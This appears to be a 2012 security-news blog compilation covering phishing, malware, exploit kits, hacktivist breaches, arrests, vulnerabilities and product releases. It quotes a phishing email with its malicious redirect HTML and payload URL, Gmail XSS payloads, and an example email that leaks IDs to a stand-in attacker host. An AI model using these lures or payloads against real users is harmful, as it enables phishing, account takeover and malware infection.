Emails with Subject "ADP Funding Notification – Debit Draft" leads to Exploits


Researchers at MX Lab , has intercepted some emails with the subject “ADP Funding Notification – Debit Draft” that lead to a malicious web site with obfuscated Javascript code.


The email is send from the spoofed address “ADP_FSA_Services@ADP.com” or “ADPClientServices@adp.com” and has the following body:


Your Transaction Report(s) have been uploaded to the web site:

https://www.flexdirect.adp.com/client/login.aspx

Please note that your bank account will be debited within one banking

business day for the amount(s) shown on the report(s).

Please do not respond or reply to this automated e-mail. If you have any

questions or comments, please Contact your ADP Benefits Specialist.

Thank You,

ADP Benefit Services
The URL will not lead you to the site that is mentioned but to hxxp://www.avrakougioumtzi.gr/PQB6j3HW/index.html where the following HTML code is executed:

<html>
<h1>WAIT PLEASE</h1>
<h3>Loading…</h3>
<script type=”text/javascript” src=”hxxp://firmowa.malopolska.pl/WVfNMNHn/js.js”></script>
<script type=”text/javascript” src=”hxxp://humas.poltek-malang.ac.id/w28K6pb6/js.js”></script>

</html>

Both embedded Javascript URLs will redirect you document.location=’hxxp://173.255.228.171/getfile.php?u=853fda24′; The above page contains an obfuscated javascript.

  After de-obfuscating the javascript, i found there is Blackhole exploit pack that try to exploit one of the vulnerable software(flash, pdf and other exploits). At the bottom of the page, you can find the applet code that try to exploit the Java Atomic reference vulerability.


Zemra ,a new Distributed Denial of Service (DDoS) crimeware bot


A Distributed Denial of Service (DDoS) crimeware bot known as "Zemra" has been identified by Symantec Researchers. This threat has been observed performing denial-of-service attacks against organizations with the purpose of extortion.

Zemra first appeared on underground forums in May 2012 at a cost of €100($125).

This crimeware pack is similar to other crime packs, such as Zeus and SpyEye, in that is has a command-and-control panel hosted on a remote server. This allows it to issue commands to compromised computers and act as the gateway to record the number of infections and bots at the attacker's disposal.

Zemra uses 256-bit DES encryption/decryption for communication between server and client;and it can spread via USB devices.

Researchers revealed that the main functionality is the ability to perform a DDoS attack on a remote target computer of the user's choosing.


New version of Citadel Trojan prevents Virtual Machine Analysis


Security Researchers from S21sec, has spotted two major changes in the latest version of Citadel Trojan. The two major changes 'Anti-emulator' and 'Encryption change' try to make malware analysts' life harder.

The anti-emulator: When it starts, a built-in detective checks if it is running in a virtual machine or in sandboxed environment (CWSandbox, VMware, Virtualbox).

If it detects their presence, it starts to behave differently. Details were not disclosed, and the technology is very tricky.

According to researchers, It simply scans through the resources of the currently running processes and looks for specific patterns for instance inside the "CompanyName" field, such as 'vmware','sandbox','virtualbox','geswall'.

While running in the VM, The Trojan creates a fake domain name and attempts to connect to it. This strategy should fool the researchers into believing that the (C&C) command and control server cannot be reached and that the bot is dead.

This is not the only change brought to Citadel. Experts have found that the RC4 is slightly different compared to previous versions, an internal hash being added to the algorithm.

"Evil" Hacker sentenced to Two-and-a-half Years

The Australian hacker nicknamed “Evil” was sentenced to two-and-a-half years in prison, but could be released on parole in 12 months because he pleaded guilty, according to Police.

25-year-old David Noel Cecil,had been arrested almost a year ago for hacking a National Broadband Network-linked service provider, changing and accessing restricted data. He was also accused of cyber-attacking Sydney University’s website, several Melbourne businesses, and companies overseas. Overall, Cecil was charged with 50 counts, but refused to be bailed.

Police ran a six-month investigation dubbed “Operation Damara”, and said the 25-year-old unemployed truck driver wanted to prove himself after failing to get into the IT sector.

“This person acted with an extreme and unusual level of malice and with no regard to the damage caused, indiscriminately targeting both individuals and companies,” National Manager Hi Tech Crime Operations Neil Gaughan said.

Feds said further charges will likely follow and others will also be arrested.

‘Confirm PayPal account' notifications lead to phishing sites


An extremely legitimately-looking PayPal themed emails has been hitting inboxes in the last few days, trying totrick users into entering their accounting data on the fraudulent web site linked in the emails.

"Dear PayPal Costumer, It has come to our attention that your PayPal account information needs to be updated as part of our continuing commitment to protect your account and to reduce the instance of fraud on our website," The fake email reads.

"If you could please take 5-10 minutes out of your online experience and update your personal records you will not run into any future problems with the online service. However, failure to update your records will result in account suspension. Please update your records before June 12, 2012. Once you have updated your account records, your PayPal account activity will not be interrupted and will continue as normal."

The offered link takes those users to a faithfully reproduced PayPal phishing site:

And while the URL of the site (hxxp://lejesepofol.altervista.org/plaoyap/plaoyap/index.htm) might warn some users about its true nature, there are still too many who won't be bothered with checking it before entering their PayPal login credentials.

Panda Security site Hacked and database compromised by @LulzSecMx


A Hacker called as @LulzSecMx, claimed to have unauthorized access to one of the biggest Anti-virus providers, 'Panda Security' website and leaked the database in pastebin. The attack announced via @LulzSecMx .

"pandasecurity.com, best known for its antivirus shit we have a message for you: D" Hacker said.

 "We entered through the back door, they have earned money by working with police to be on the lookout and inform activists, your page as your antivirus is bullshit!"

The leak contains email address, encrypted passwords and some other confidential data compromised from the PandaSecurity.com website.

Anonymous Hackers attacked Japanese Govt. sites in Protest of Anti-Piracy Laws


The international hackers collective Anonymous has launched a series of cyber-attacks against Japanese government websites in protest at new stiffer penalties for illegal downloading that were passed in a copyright law amendment last week.

According to The Japan Times, the law was approved by the Education, Culture and Science Committee of the House of Councilors with 221 votes in favor.

After October 1, when the law goes into effect, users who download copyrighted content or copy DVDs may receive a fine of up to ¥2 million ($250,000 or 200,000 EUR) and can even be sentenced to a maximum of two years in prison.

Many fear that the way the bill is worded leaves a lot of room for interpretation, which could lead to a lot of unfair prosecutions.

In response to the news, Anonymous has released a statement that announces the start of an operation against the Japanese government.

“Earlier this week Japan approved an amendment to its copyright law which will give authorities the right to imprison citizens for up to two years simply for downloading copyrighted material,” Anonymous wrote.

“We at Anonymous believe strongly that this will result in scores of unnecessary prison sentences to numerous innocent citizens while doing little to solve the underlying problem of legitimate copyright infringement,” the hacktivists added.

“If this situation alone wasn’t horrible enough already, the content industry is now pushing ISPs in Japan to implement surveillance technology that will spy on and every single internet user in Japan. This would be an unprecedented approach and severely reduce the amount of privacy law abiding citizens should have in a free society.”

They concluded by launching a threat against the government and organizations that represent rights holders.

“To the government of Japan and the Recording Industry Association of Japan, you can now expect us the same way we have come to expect you in violating our basic rights to privacy and to an open internet.”

After the operation was announced, The finance ministry’s website was hacked with messages opposing the stricter copyright laws posted on a number of its pages. The sites of the Supreme Court of Japan and the Intellectual Property High Court were also reported down overnight, while access to the sites of the two main political parties was said to be restricted.

Hook Analyser 2.0 released -reversing application and analysing malwares

Hook analyser is a hook tool which could be potentially helpful in reversing application and analysing malwares.

Changelog:

  • Static analysis functionality has got improved significantly.
  • Nice fingerprinting feature (part of the static analysis module).
  • Analysis and logging modules have improved.
  • No more annoying browser pop-ups (previous releases had some).
Download it from here:
http://beenuarora.com/HookAnalyser2.0.zip

Blackhole Exploit Kit upgraded to generate pseudo-random domains

Blackhole Exploit Kit is one of the famous Exploit Kit which is being used by Cyber Criminals for infecting innocent users through Drive-by-download.  It delivers different exploit including Java, Adobe Flash Player, Adobe Reader, Windows Help Center, and other applications.

Although this approach has generally been very successful for malware authors, it has had one weakness. If the location or URL for the iframe, which actually contains the malicious code, changes or is taken down, all of the compromised sites will have to be updated to point to this new location. This process is difficult and impractical.

To deal with this, the Blackhole JavaScript code on compromised sites now dynamically generates pseudo-random domains ,based on the date and other information, and then creates an iframe pointing to the generated domain.

After de-Obfuscating the javascript in the compromised pages, symantec researchers found a code that pseudo-random domains.

This code uses the setTimeout() DOM function to run a particular piece of code (the anonymous function at the bottom of the code) after half a second. This function calls the following:

  • generatePseudoRandomString() function, with a timestamp
  • 16, the desired length of the domain name
  • ru, the top-level domain name to use

The code then creates a hidden iframe, using the previously-generated domain as the source.

Once the domain has been generated and the iframe has been created, the exploit kit page runs many exploits as normal, going to great lengths to determine, for example, which compromised PDF file to show, depending on the version of Adobe Reader installed.

Running this code in isolation, it seems that the pseudo-random domain is based on a number which is in turn based on an initial seed value, the current month and the day of the current month. When running the code at the time of writing, it returned:

lfbovcaitd[REMOVED].ru

By changing the date passed to the function we can determine domains that will be used in future. All domains up to 7 August of this year have been registered and all currently resolve to the same IP address. The domains, all recently registered, use private registration, such as details of the registrant not published in WHOIS.

FBI two-year cybercrime sting leads to 24 arrests


The FBI orchestrated a two-year cybercrime sting that resulted in 24 arrests, with some alleged hackers facing more than 20 years in prison for allegedly profiting from stolen information such as credit card and bank account numbers, law enforcement authorities announced today.

The U.S attorney's office in Manhattan and the FBI announced the arrests and provided details of the sting operation, which involved FBI agents posing as hackers while the bureau set up a fake "carding" forum, according to the press release (see the full release below).

Carding is the term for crimes associated with exploiting stolen personal information for profit. The forums helped "carders" communicate and, in some cases, find mailing addresses -- usually empty apartments or houses -- for products purchased with stolen credit-card data.

While the sting netted 24 arrests across eight countries, authorities only shared the charges of 12 alleged hackers. These individuals were charged with several counts of fraud, including selling personal data, using stolen information to purchase or obtain products, and selling tools to aid hackers in stealing information.

The FBI claims it prevented 400,000 potential cybercrimes via this operation.

via cnet

Airport of Sydney Hacked and Data Leaked by Zer0Pwn


The Hacker known as 'Zer0Pwn' claimed to have unauthorized access to the Airport of Sydney website(sydneyairport.com.au).

Hacker dumped the compromised data in pastebin along with database details. The dump contains username and password(plain text). Hackers also post the admin login page details.

"We have gained access to the FIDS (Flight Information Display System) of your airport, and we are leaking the data. We're proving that literally, NOTHING is secure. " Hacker said in the leak.



University sites are being targeted by Team Dig7tal

The hacker group known as 'Team Dig7tal', breaking into University websites and leaked confidential data. They hacked into sites belong to University of Florida,Stanford University,University of Nebraska.

Hacker leaked the part of the database belong to University of Florida.  "These databases have tens of thousands of entries each, so I only dumped a sample of the first DB " Hacker said.

Earlier of this month, University of Florida notified users that database could have been compromised.  The recent hack clearly indicates that site is still vulnerable.

Hackers dumped the data belong to University of Nebraksa - Lincoln in AnonPaste.  "They failed to fix the SQL i vulnerability the first time, so it's a little worse this time. I'm hoping they'll take the time to fix it after this one. Probably not though...Anyway, let's get started." Hacker said.

The data leak contains username ,email address, hashed passwords, and other database details.

Security flaw in Kuwait Banking system, found by C0mrade

A Hacker called as c0mrade, has  been trying to raise awareness of the vulnerabilities in the Government sites. He claimed to have found vulnerability in Kuwait’s banking system.

According to the hacker, the software vulnerability affects Commercial Bank of Kuwait( CBK.com), NBK.com and other Banking Website associated with Kuwait.

To prove the seriousness of the vulnerability, C0mrade has leaked a database containing the details of around 3,000 customers and transaction logs(Credit card data censored).

"I am not a gutless Terrorist who prays for the Downfall of this Planet and the desire for it to become a Wasteland and all that comes left of it is Billions of bodies piled up onto each other, burnt remains and destroyed buildings. With that being said, I have a sudden thirst for epistemology. Let me elaborate, folks." Hacker said in the pastebin.

Biggest banking Trojan Botnet suspect arrested by Russian Authorities


Russian police authorities arrested 22-year-old hacker, who is allegedly responsible for comprising more than 4.5 million computers – making it the largest publicly known botnet to date.

According to Russia’s Interior Ministry, the hacker used banking trojans to steal 150 million roubles($4.5 million or 3.6 million EUR), from private individuals and organisations.

The young man was known as "Hermes" and "Arashi" in online communities and apparently used variants of Carberp and similar trojans to commit the crimes. The trojan stole users' access credentials and used them to transfer money to bogus companies. Helpers then withdrew the stolen money from cash points. Most of the victims were Russian nationals.

This is the biggest banking Trojan botnet ever to be uncovered in Russia, according to reports, and one of the biggest in the world. Every day, the botnet operator would attempt to install malware on around 1 million computers, which meant that on some days, around 100,000 computers would join the network.

The authorities say that the arrest of "Hermes" and other members of his hacker group was carried out with the assistance of anti-virus company Dr. Web. Most of the accomplices lived in Moscow and St. Petersburg while "Hermes" was arrested in Southern Russia according to the reports.


Iranian Central Bank hit by DDOS attack

The Central Bank of Iran was hit with a cyber attack on Tuesday which brought down the bank’s internet connection, according to the Iranian Labour News Agency (ILNA).

An analyst quoted by the news service said the attack brought down the CBI’s website and the” internal network’s going offline for an extended period is a sign there was a cyber-attack against the Central Bank of Iran.”

The attack occurred the same day in which negotiations in Moscow over Iran’s nuclear program failed to produce any positive results. European Union foreign affairs chief Catherine Ashton told reporters there are “significant gaps” between the positions of Iran and world powers when it comes to an agreement on Iran’s nuclear ambitions.

Heydar Moslehi, the intelligence minister for Iran, said on Thursday that cyber attacks against the Islamic Republic have increased since the meetings in Moscow ended.

On Wednesday, websites associated with the highest levels of Israeli government were unavailable as well. This came one day after the Washington Post published a story that Israel and the United States worked on a computer virus named “Flame”, in order to collect information inside Iran as a prelude to cyber-attacks aimed at slowing the Iranian nuclear program.

Source: The Algemeiner

NT OBJECTives Releases New NTOEnterprise for Web Application Vulnerability Program Management

NT OBJECTives, a provider of automated, comprehensive and accurate web application security software, services and SaaS, today announced the availability of NTOEnterprise 2.0 which enables organizations to plan, manage, control and measure thousands of web application scans and also assess and prioritize areas of greatest risk across the enterprise.



“With NTOEnterprise, security teams, developers and CSOs can quickly view and easily understand how their organization’s security is improving, or not, and more importantly, what they can do about it. They can prioritize threats and respond more rapidly to their key areas of vulnerability,” says Dan Kuykendall, CTO and co-founder of NT OBJECTives. “With our customers’ input, we were also able to design an incredibly useful customizable report and graphic generation engine in the new version as well.”



NTOEnterprise features a consolidated graphical view of the enterprise security posture across all enterprise applications, allowing security professionals to easily determine vulnerability and application behavior trends, along with the overall status of the application security program. The new version includes data tagging capabilities that enable security teams to view applications by any user-defined criteria such as business unit, business risk, criticality, owner, location or any other grouping that can help security professionals organize applications. Security professionals now also have the ability to quickly navigate scan plans and configurations through flexible search functionality based on domain names, scan times and custom tagging.



NTOEnterprise enables customers to:
  •  Scale application security programs to handle simultaneous scans
  •  Centralize management and control of scan configurations, schedules and permissions
  •  Share information beyond security teams to developers, QA teams and executives
  •  Demonstrate compliance with regulatory and organizational security policies


NTOEnterprise 2.0 enhancements include:


Centralized Management Console
The new centralized dashboard provides a consolidated view of web application scans that includes:

· Active vulnerabilities by vulnerability type

· Six month vulnerability trending chart

· Recent completed scans

· Scans in progress



Enterprise Scan Management
The enhanced user interface improves users’ ability to initiate, schedule and configure application scans through. The consolidated interface enables users to quickly view in-progress, recent and scheduled scans. Scans can be scheduled to run at regular monthly or quarterly intervals to provide ongoing monitoring of application security issues.


Blackout Management
Users have an improved ability to define when scans can't happen and when they can with improved blackout functionality. Only administrators can define blackout periods and the defined blackouts trump scheduled scanning so users can feel confident that business operations won’t be impacted.


Asset Tagging
New asset tags facilitate flexible custom reporting and a graphical view of the security posture across all enterprise applications. Organizations can define (customize) their own tags to view applications and vulnerabilities from different vantage points. Organizations can tag by location, team or business functionality such as which applications store credit card data or Personally Identifiable Information (PII). In addition, organizations can define trending data to show vulnerability trends over time.


Custom & Graphical Report Generation
New custom report generators allow users to define filters to quickly find and analyze vulnerability information from their scans. The custom reports and charts provide fantastic presentation data for management.


Test Management Software Integration
NTOEnterprise is now capable of creating tickets for each discovered vulnerability in popular issue management systems. Supported systems: RSA Archer, HP Quality Center and Atlassian's JIRA.

Infrastructure & Performance
NTOEnterprise’s back-end infrastructure has been enhanced to optimize user experience and performance. The new installation model enables organizations to implement tighter security controls to each component.


For more information visit http://www.ntobjectives.com/security-software/ntoenterprise-centralized-application-security


About NT OBJECTives

NT OBJECTives, Inc. has been dedicated to solving the most difficult application security challenges for over 10 years. NTO’s software, SaaS and services solutions are designed to help organizations build the most comprehensive, efficient, accurate web application security program. NTO’s SaaS offering, NTOSpider On-Demand, can be augmented with enhanced services including false positive validation and business logic testing. NT OBJECTIVES is privately held with headquarters in Irvine, CA.


Famous Porn Network Hacked By 3xp1r3 Cyber Army



The Bangladeshi Hackers group known as 3xp1r3 Cyber Army hacked famous porn websites and defaced them.

The list of hacked sites are:
  • http://freehardcoreporn.xxx/
  • http://freecelebritysextapes.xxx/
  • http://findafuck.xxx/
  • http://celebritypornmovies.xxx/
  • http://redhotvoucher.com/
  • http://aienetwork.com/
  • http://xlmedianetworks.com/
  • http://aien.xxx/

At the time of writing this article, sites are not recovered and we are able to see the defacement.

The mirrors for the defaced pages:
http://zone-hack.com/mirror/id/62923
http://zone-hack.com/mirror/id/62924
http://zone-hack.com/mirror/id/62925
http://zone-hack.com/mirror/id/62926
http://zone-hack.com/mirror/id/62927
http://zone-hack.com/mirror/id/62928
http://zone-hack.com/mirror/id/62929
http://zone-hack.com/mirror/id/62930

Cyber-war :more Bangladesh Government sites hacked by Myanmar Hackers

After Bangladesh cyber army declares cyber-war against Myanmar and hack few government sites, Myanmar Hackers group known as 'Blink Hacker Group(BCH)' hack more Bangladeshi Government sites.

The hacked sites are Bangladesh Public Service Commission (BPSC),Information and Communication Technology Division,Cabinet Division,Pabna Textile Engineering College,Ministry of Defence,NID Registration Wing,Bangladesh National Commission for UNESCO.

Disaster Management Bureau(DMB),Department of Textile,Economic Relations Division (ERD),Bangladesh Election Commission,Ministry of Communication,Ministry of Civil Aviation and Tourism and more sites become victim of this cyber attack from Myanmar Hackers.

Hacker provide us the list of hacked sites.  Here you can find the list:
http://pastebin.com/raw.php?i=jnqXLNX1.


Hackers wipe out the database from the hacked sites. At the time of writing this article, all sites appeared to be suffering database connection issues.

Bluebox Launches with $9.5 Funding Led by Andreesen Horowitz/Andreas Bechtolsheim Joins Board

Bluebox, a start-up developing the next evolution in enterprise security technology, announced today that it has closed a $9.5 million Series A financing round led by Andreessen Horowitz.

Additional investors include Andreas Bechtolsheim, co-founder of Sun Microsystems and one of the first investors in Google, SV Angel, Ram Shriram, board member of Google and one of its first investors, and Brian Cohen, former CEO of SPI Dynamics (acquired by HP). Along with the initial round of funding, Bechtolsheim and Scott Weiss, general partner at Andreessen Horowitz, have been named to the company’s board of directors.

Bluebox is founded by veteran entrepreneurs with strong security DNA. Bluebox CEO and co-founder Caleb Sima served as Chief Technology Officer for HP’s Application Security Center and was responsible for directing the lifecycle of the company’s web application security solutions. He joined HP following the acquisition in 2007 of SPI Dynamics, the company he co-founded and led as CTO, where he oversaw the development of WebInspect - a solution that set the bar in Web application security testing tools. Prior to co-founding SPI Dynamics in early 2000, Caleb worked for Internet Security Systems’ elite X-Force R&D team and as a Security Engineer for S1 Corporation.

Co-founder Adam Ely was previously CISO of the Heroku business unit at salesforce.com. Prior to salesforce.com, Adam led security operations, application security, and compliance for TiVo. Before TiVo, he led security functions within The Walt Disney Company, responsible for properties including ABC.com, ESPN.com, and Disney.com.

“Enterprise security on mobile is an unsolved problem, and, frankly, is in need of innovation,” said Bechtolsheim. “Bluebox is developing a solution that will change the way enterprises think of how to successfully and seamlessly protect their data.”

"This is the most amazing security team that I've seen in a long time," said Scott Weiss, general partner at Andreessen Horowitz and former CEO of IronPort Systems, which was acquired by Cisco. "They are going after one of the hardest problems that companies face and where incumbents have floundered."


Bluebox is hiring world-class developers, who want to work on breakthrough security technology. Interested individuals should contact the company rockstars@bluebox.com. Visit www.bluebox.com to learn more, or follow us on Twitter @BlueboxSec.


New ZitMo Trojan masquerades as Android Security Suit Premium

Android users who are looking for the good Antivirus should beware of this latest threat which masquerades as Android Security suit premium application. Kaspersky recently come across 6 APK files, which functionality is almost the same as in old ZitMo samples.

Zitmo(Acronym of Zeus-in-the-mobile) is mobile component of the Zeus Banking malware. The malware steals incoming SMS and sends them to command-and-control(C&C) servers operated by the attackers.

After further analysis of the new variant, researchers found that the C&C ’re somehow connected to domains that show up in their ZeuS C&C database.

"So, there is new piece of Android malware which steals incoming SMS messages and uploads them to the remote server," Denis Maslennikov, a Kaspersky Lab expert said.

"The newest variant of ZitMo demonstrates the commitment to effective mobile spyware development and distribution that cybercrime has made," Kurt Baumgartner, senior security researcher at Kaspersky Lab told to ComputerWorld.

As usual, Users are advised to install Android apps from the official Google Play website and should always look at an app's reviews and download statistics to determine if it's trustworthy.

Cyber War between Myanmar Hackers and Bangladeshi Cyber Army


A Bangladeshi hackers group known as 'Bangladeshi Cyber Army(BCA)' has declared a cyber-war on Myanmar, accusing the country of killing innocent Muslims and its hackers of breaching Bangladeshi websites.

"This injustice over the Muslims and attack on the Bangladeshi cyber space has forced us to react. In this situation, we feel the necessity of a cyber war, against racists." Hackers posted in their official facebook page.

"Human Rights Commission and other Governments who have the ability to stop all these are sitting idle under this situation. We request them to come forward and stand against injustice."

As part of the Cyber War, The BCA take down the number of Myanmar government sites by DDOS attack. Ministry of Foreign Affairs (www.myanmar.gov.mm), Ministry of Co-operatives (www.myancoop.gov.mm), Ministry of Construction (www.construction.gov.mm), Ministry of Forestry (www.myanmarteak.gov.mm), Ministry of Agriculture and Irrigation (www.moai.gov.mm) sites are seems to be down at the time of writing this article.


Hackers also defaced the websites of Myanmar Tour And Travel, the University of Medicine in Mandalay, Myanmar Logistics Co, Client Focus Technology Group, UN Framework Convention on Climate Change, The Royal Hantha Arts of Myanmar Artists, Myanmar Clover Hotel Yangon, and others.

As part of the Cyber-war, Myanmar hackers also started to hack more Bangladeshi sites. More than 30 Bangladeshi government sites were defaced. The sites are Ministry of Education, Department of Relief & Rehabilitation,Ministry Of Industries and others. The full list of hacked sites can be found here.

CVE-2012-1875 : Exploit for Remote Code Execution Flaw in Internet Explorer 8


After less than a week Microsoft released security advisory detailing a number of critical vulnerabilities in Internet Explorer, an exploit code has been made available for the CVE-2012-1875 remote code execution flaw.
CVE-2012-1875: Microsoft Internet Explorer 8 does not properly handle objects in memory, which allows remote attackers to execute arbitrary code by accessing a deleted object, aka "Same ID Property Remote Code Execution Vulnerability."

While releasing the security advisory, Microsoft also issued a warning that working exploit code could be released within 30 days. As usual, it doesn’t take much time for such popular attack codes to become available.

Also, this is not the only vulnerability that affects Internet Explorer. There’s another critical flaw in Microsoft XML Core Services that hasn’t been patched yet, but for which the Redmond company released a temporary fix.

The Metasploit exploit framework has been fitted with a module that takes advantage of the vulnerability, meaning that the attack option is freely available to anyone who knows how to use the framework


AV Bypass for Malicious PDFs Using XML Data Package (XDP) format

Security researcher Brandon Dixon has discovered a way to bypass the Antivirus detection for malicious PDFs using the XML Data Package(XDP) format.

XDP is an XML file format created by Adobe Systems in 2003. It is intended to be an XML-based companion to PDF. It allows PDF content and/or Adobe XML Forms Architecture (XFA) resources to be packaged within an XML container.

As XDP files are opened by Adobe Reader just like a normal PDF would be , opening the malicious XDP file can result in Adobe Reader Exploit.

Dixon's test document, which uses a two-year-old security vulnerability in Adobe Reader, was only detected by one anti-virus package in his tests. After experimenting with the XDP format, he was able to create another file that fooled all 42 anti-virus engines used on VirusTotal.

"The exploit is old. The JS is not encoded. This shoud be fixed. If you are wondering how to combat against this on your network or in your inbox, then look for XDP files."Dixon said in his blog.

"Of course, one could simply change the extension and still trick the user, but only awareness can fix that. For those with DPI, look for the Adobe XDP namespace and base64 code to identify the PDF embedded inside. "

Ghost, a honeypot for capturing USB malware

The Honeypot project has released first public version of malware Honeypot called as "Ghost".

Ghost is a honeypot for USB malware. It is capable of capturing malware that propagates via USB storage devices without any further knowledge. This is done by emulating a USB thumb drive and tricking malware into infecting the emulated device. Due to the fact that a machine must be infected in order for the virtual device to detect the malware, the honeypot is designed to run on Windows systems, which are mainly targeted by malware at themoment.

Currently, Ghost only supports Windows XP and is in an early development stage, although its concept has been shown to work well, and the code is stable. If Ghost detects an infection, then it will currently only report that the machine is possibly infected, without including any additional information.

The team plans on extending Ghost's reporting capabilities, and to make it run on other versions of Windows. We can expect the complete product on August 31. The source code and binary for this file can be found here.

Google's MarkMonitor account hacked by #UGNazi via Social Engineering


The well-known Hacker group UGNazi claimed that they gained access to the Google's MarkMonitor account.  According to their press release, hackers managed to reset the account via social engineering attack. 

"The agent that helped us reset the account should get some what of credit, she helped us alot on reseting Google's MarkMonitor account " hacker said in the press release.

"3 Days ago, We gained access into Google's registrar MarkMonitor, the following picture goes to show how no one is safe http://i.imgur.com/KDWja.png" The tweet from hackers account reads.

"i suggest you move to a more secure registrar. but then again, we are Social Engineering Gods." The statement clearly shows the group is strong in social engineering attacks. Earlier of this month, the group hacked the WHMCS via social engineering attack.

"So, this just goes to show, even Google can be Social Engineered. P.S. It was Google's Account Manager, Olga Was, so technically, we did Social Engineer Google. :)."Hacker said.

At the time of writing, there is no official statement made from Google or Mark Monitor about the hack.


AVG Family Safety web browser: Keep your family safe online


AVG has launched the iOS and Windows Phone versions of its Family Safety web browser to ensure that adults and their children are protected from online threats such as scams, phishing and potentially dangerous websites.

“With people increasingly using mobile devices to access social networks and browse the web, protecting these devices against online threats has become vital,” JR Smith, the CEO of AVG Technologies.

“Online scams and attacks are on the rise and can occur on any platform with access to the web. AVG aims to protect its users wherever they go. With AVG Family Safety for iOS and Windows Phone, we provide our users the peace of mind that they and their children are protected against online threats on these mobile platforms too.”

One of the best features of AVG Family Safety is the fact that it allows parents not only to monitor their children’s online activities, but also to set up restrictions and set filters across mobile devices and personal computers.

Memory Corruption Vulnerability in Firefox 13


A security researcher Ucha Gobejishvili has discovered a memory corruption vulnerability in the Firefox 13, the latest version of Mozilla Firefox.

The vulnerabilities can be exploited by local privileged user accounts with low user inter action or remote via manipulated http request & high required user inter action.

According to softpedia report, the researcher notified the Mozilla about the vulnerability. He told that Mozilla confirmed the existence of the vulnerability and planned on fixing it in the upcoming versions.

In a Proof-of-concept video , the researcher showed that by launching the specially crafted HTML file the vulnerability would be triggered, causing a denial-of-service (DOS) state.

In practice, an attacker would have to host a website that contains the malicious webpage. Then, with the aid of cleverly designed emails or instant messages, he could lure potential victims to the website.

The POC video:

Two pakistani high profile site hacked by Silent HaxOR from Indishel

A hacker called as silent Hacker, from Indishell, claimed he hacked into two high profile pakistan websites.

One of the victim site is Citizens Police Liaison Committee Of Pakistan(
http://www.cplc.org.pk/images/). The second victim site is Pakistan biggest and Largest Advertising Agencies, Media buying(timenspacemedia.com).

The mirror of defacements:
http://zone-h.net/mirror/id/17890564

http://arab-zone.net/mirror/101578/timenspacemedia.com/

TweetGif hacked and 10,000 Twitter Users data dumped by LulzSec Reborn



The hacker group known as "LulzSec Reborn" claimed to have hacked into the TweetGif website (tweetgif.com) and compromised the database. TweetGif is a thirt-party twitter app that lets users share animated GIFs.

After the security breach, the hackers dumped a part of database that containing the credentials for more than 10,000 Twitter accounts. The dump contains access tokens and the associated access token secrets which can be used to access users' Twitter accounts.

The leak also contains users names, locations, bio information, links to avatars, and the date of the last update.

The tokens remain valid even when the account password is changed. If you used the app, all you need to do is head into Twitter's settings and revoke access to the app—no massive password changes required.

Global Payments Credit card processor finds more trouble from breach



Global Payments Inc. issued another statement, more than two months after it first reported that computer hackers may have compromised data from as many as 1.5 million credit and debit card accounts in North America.

Initially, the company are confident that their estimate on compromised card details is correct. After further investigation, they discovered that hackers may have access the personal information belong to a number of consumers.

“Our ongoing investigation recently revealed potential unauthorized access to personal information collected from a subset of merchant applicants. It is unclear whether the intruders looked at or took any personal information from the company’s systems,” reads the statement.

As an additional precaution, Global Payments said it alerted card issuers about more than 1.5 million potentially affected accounts so they can be on the lookout for suspicious activity.

After the breach, both Visa Inc. and MasterCard Inc. removed Global Payments from their lists of third-party vendors that meet the payment processing industry’s security standards.


VoxAnon IRC Network suffers DDOS Attack

The VoxAnon, an IRC Community created as a platform to help facilitate inter-Anonymous discussion and activities , has experienced distributed denial of service(DDOS) attack.

“VoxAnon will be back soon! Check this page frequently for updates!” a message posted in the The main page of VoxAnon.org.


“#VoxAnon is down due to #DDOS Haters will hate. We won't stop doing what we do best,” a tweet posted on June 10 from VoxAnon IRC .




According to a report from HOTforSecurity, the DDOS attack may have been launched by other hacktivists who name VoxAnon a platform on which security companies and law enforcement look around.




64-bit OS & virtualization software running on Intel CPU vulnerable to local privilege escalation


A critical security vulnerability has been discovered in the 64 bit operating system and virtualization software running on Intel CPU , which leads to privilege Escalation exploit or a guest-to-host virtual machine escape.

The problem affects 64-bit versions of Windows, Linux, FreeBSD and the Xen hypervisor. The flaw seems to only affect Intel hardware – AMDand ARM CPUs are not affected.

"A ring3 attacker may be able to specifically craft a stack frame to be executed by ring0 (kernel) after a general protection exception (#GP)."US-CERT's vulnerability report reads.

" The fault will be handled before the stack switch, which means the exception handler will be run at ring0 with an attacker's chosen RSP causing a privilege escalation. "

Metasploit penetration testing framework founder H.D. Moore characterized the bug as a "serious guest-to-host escape vulnerability," noting that while it affects the Xen platform, it doesn't affect VMware.

To this end, operating system specific details on the vulnerability have been published by Xen, FreeBSD and Microsoft. Linux vendor Red Hat has also published two updates on the problem: RHSA-2012:0720-1 and RHSA-2012:0721-1.

To close the security hole, users should apply updates from their operating system supplier.

Google patched Persistent XSS vulnerabilities in Gmail


A security Researcher Nils Junemann discovered persistent cross-site scripting (XSS) vulnerabilities in Gmail and notified Google before few moths, Google patched the vulnerabilities now.

According to his blog post, Junemann found three different XSS vulnerabilities in Gmail. The first security flaw is "Persistent DOM XSS (innerHTML) in Gmail's mobile view" :

A incoming mail containing <img src=x onerror=prompt(1)> within the subject and forwarded to another user, has lead to XSS.

The second one is very simple non-persistent XSS in Gmail's mobile view:
https://mail.google.com/mail/ mu/#cv/search/%22%3E%3Cimg% 20src%3Dx%20onerror%3Dalert(2) %3E/foobar

The third security issue is very intersting persistent XSS. He discovered that there was a way for an attacker to get access to several key pieces of information in the URLs that Gmail generates when it displays a message to a user.

When a message is displayed directly, rather than as part of a user's inbox, it contains both a static user ID and an identifier for the individual message. Those values shouldn't be available to an attacker, but Juenemann found that he could get them through referrer leaks.

"An attacker doesn't know the ik and the message id . Without both values it's not possible to generate the special URL. But it's easy to get both values through referer leaking.

We have to send to our victim a HTML e-mail with that content:
<img src=" https://attackershost.com/1x1.gif " >
<a href=" https://attackershost.com/gmailxss ">Click here to have fun</a>
<script>alert(/xss/)</script>
When the user opens the email message, the GIF image will send the user ID and message ID to theattacker's server. The second URL also will leak that data if the user clicks on it. The script will then display a Javascript alert, and that's the attacker's code runningin the context of Gmail.

#ProjectWestWind : Team GhostShell hacked Italian Government Sites

A Hacker known as Echelon, leader of Team GhostShell, launched a new campaign called ProjectWestWind, an operation aimed at “extreme-right nationalism and racism” in politics.


“As some of you may know (although not nearly as many as it should be), Europe has these past few years been hit by waves of extreme-right nationalism and racism in its political sphere. This includes nationalist political parties like Hungary's ‘Jobbik’, Italy's ‘Lega Nord’ and Finland’s ‘True Finns’,” Echelon said.

